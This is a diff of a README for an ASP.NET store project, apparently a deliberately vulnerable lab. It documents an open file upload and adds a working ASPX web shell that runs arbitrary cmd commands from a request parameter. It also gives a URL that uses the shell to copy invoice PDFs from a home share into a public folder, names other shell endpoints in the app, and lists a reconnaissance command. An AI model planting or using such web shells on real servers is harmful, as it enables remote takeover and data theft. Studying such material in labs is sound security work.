MunroRaymaker/MvcProductStore/README.md

 Customer service page has upload functionality which saves files in Uploads folder.
 Could be exploited for reverse shell upload.
 Seems like anything can be uploaded and directory browsing is enabled.

-### Exploitation
 If we can get access to the server it's easy to upload your own shell code and have the website execute it.

+Try creating a file called shell.aspx with this content

+<%@ Page Language="C#" %>
+<%@ Import Namespace="System.Diagnostics" %>

+<%=
+    Process.Start(new ProcessStartInfo("cmd","/c " + Request["c"])
+                    {
+                        UseShellExecute = false,
+                        RedirectStandardOutput = true
+                    }).StandardOutput.ReadToEnd()

+    %>

+	Upload it to contact us page as attachment shell.aspx.

+Then type
+http://localhost:50881/Uploads/shell.aspx?copy %HOMESHARE%\Fakturaer\*.pdf C:\Dev\Sandbox\MvcProductStore\MvcProductStore\Uploads

+Then check content of Uploads directory.

-There is a Shell method in the StoreManager controller /StoreManager/Shell.
+If the above fails then there is a Shell method in the StoreManager controller /StoreManager/Shell.
 Check it out.
 Also another shell in the root /shell.aspx?c="COMMAND HERE".

 #### Usefull commands:
 net localgroup Users